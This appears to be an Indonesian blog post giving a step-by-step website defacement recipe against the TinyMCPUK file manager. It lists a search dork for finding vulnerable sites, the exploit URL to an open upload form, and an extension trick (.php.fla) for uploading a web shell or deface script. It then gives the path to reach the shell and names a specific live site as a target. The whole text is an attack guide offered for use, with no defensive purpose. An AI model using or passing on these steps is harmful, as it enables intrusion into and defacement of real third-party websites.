Deface Poc Vulnerability Tinymcpuk (Live Target)

Dork: inurl:tinymcpuk/filemanager
intext:All rights reserved. © 2015 Media Tech Indonesia


Shell? Download (bila perlu)

Exploit: tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Step by Step
Dorking pake dork diatas

Kalau udah nemu web vuln, pasangkanlah exploit berikut ini pada ujung url.
/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Contohnya :
target.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Klo vuln maka akan muncul tempat upload nya

Bypass lah extensi shell kamu atau script deface kamu jadi .php.fla atau .htm.fla, lalu upload lah pada form upload yang tersedia.

Cara akses shell atau script deface kalian adalah :
 /tinymcpuk/gambar/Flash/shell.php.fla

Live target?, nih nemu web vuln:
http://www.trisolusi.co.id/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel